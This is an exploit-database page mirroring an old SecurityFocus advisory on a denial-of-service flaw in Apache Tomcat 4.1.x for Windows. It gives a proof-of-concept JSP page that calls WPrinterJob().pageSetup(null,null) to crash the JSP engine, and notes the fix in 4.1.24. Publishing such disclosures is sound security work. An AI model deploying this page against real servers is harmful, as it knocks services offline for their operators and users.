header-logo
Suggest Exploit
vendor:
Tomcat
by:
SecurityFocus
7.5
CVSS
HIGH
Denial of Service in Apache Tomcat for Windows
400
CWE
Product Name: Tomcat
Affected Version From: Apache Tomcat version 4.1.12
Affected Version To: Apache Tomcat version 4.1.23
Patch Exists: YES
Related CWE: N/A
CPE: o:apache:tomcat
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows
2002

Denial of Service in Apache Tomcat for Windows

A vulnerability has been reported in Apache Tomcat for Windows that results in a denial of service condition. The vulnerability occurs when Tomcat encounters a malicious JSP page. The following snippet of code is reported to crash the Tomcat JSP engine: new WPrinterJob().pageSetup(null,null);

Mitigation:

Upgrade to Apache Tomcat version 4.1.24 or later.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/4995/info

A vulnerability has been reported in Apache Tomcat for Windows that results in a denial of service condition. The vulnerability occurs when Tomcat encounters a malicious JSP page.

The following snippet of code is reported to crash the Tomcat JSP engine:
new WPrinterJob().pageSetup(null,null); 

<%@ page contentType="text/html;charset=UTF-8" pageEncoding="iso-8859-1"
%>
<%@ page import="sun.awt.windows.*" %>
<%! %>
<%
//
%>
<html>
<head>
<title>aa</title>
</head>
<body>

<p>
<FONT SIZE="+2">dON/T TR1 thiz @ home</font>
</p>
<%
new WPrinterJob().pageSetup(null,null);
%>

</body>
</html>

Navigation

Suggest Exploit

Services By CQR